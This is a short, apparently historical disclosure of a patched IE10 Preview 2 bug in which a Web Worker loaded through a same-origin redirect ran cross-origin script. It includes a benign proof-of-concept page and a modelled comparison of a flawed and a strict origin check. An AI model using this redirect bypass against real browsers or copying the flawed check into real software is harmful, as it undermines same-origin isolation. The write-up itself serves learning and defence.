The W3C spec requires Web Workers to be same-origin, and IE10 Preview 2 enforced that correctly — until I tried using a server-side redirect. A worker created from a same-origin URL that immediately redirected to a different domain loaded the cross-origin script without throwing any security error.
<script>
function main()
{
    var worker = new Worker("redir.aspx"); // redirects to a different domain
    worker.onmessage = function(e)
    {
        alert(e.data);
    }
    worker.postMessage("");
}
</script>
<input type="button" value="Load content from a different domain" onclick="main()" />

// worker.js (served from the redirected domain)
self.onmessage = function(event)
{
    self.postMessage('Message from Worker on a different domain');
}
The browser checked the origin of the initial URL rather than the final destination after the redirect, so the same-origin check was effectively bypassed. The worker then ran cross-origin script and could communicate back via postMessage.
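The difference between checking the initial URL and checking the whole redirect chain can be modelled in a few lines. This is an added example, not code from the original post or from any browser; the hosts, the `moved.aspx` entry, the redirect table and the function names are constructed for illustration.

```javascript
// Constructed redirect table standing in for server responses (hypothetical hosts).
const REDIRECTS = new Map([
  ["https://app.example/redir.aspx", "https://other.example/worker.js"],
  ["https://app.example/moved.aspx", "https://app.example/worker.js"],
]);

const sameOrigin = (a, b) => new URL(a).origin === new URL(b).origin;

// Follow the constructed redirect chain and return every URL visited.
function resolveChain(startUrl, maxHops = 5) {
  const chain = [startUrl];
  let current = startUrl;
  while (REDIRECTS.has(current)) {
    if (chain.length > maxHops) throw new Error("too many redirects");
    current = REDIRECTS.get(current);
    chain.push(current);
  }
  return chain;
}

// Flawed check (the behaviour described above): only the URL passed to
// new Worker() is compared with the document's origin.
function flawedAllowsWorker(documentUrl, scriptUrl) {
  const requested = new URL(scriptUrl, documentUrl).href;
  return sameOrigin(documentUrl, requested);
}

// Corrected check: every hop, including the final one, must be same-origin.
function strictAllowsWorker(documentUrl, scriptUrl) {
  const requested = new URL(scriptUrl, documentUrl).href;
  return resolveChain(requested).every((hop) => sameOrigin(documentUrl, hop));
}

const page = "https://app.example/index.html";
for (const script of ["redir.aspx", "moved.aspx", "https://other.example/worker.js"]) {
  console.log(script, "flawed:", flawedAllowsWorker(page, script),
              "strict:", strictAllowsWorker(page, script));
}
```

Only `redir.aspx` separates the two checks: the flawed version accepts it because the requested URL is same-origin, while the strict version rejects it at the cross-origin hop.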
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.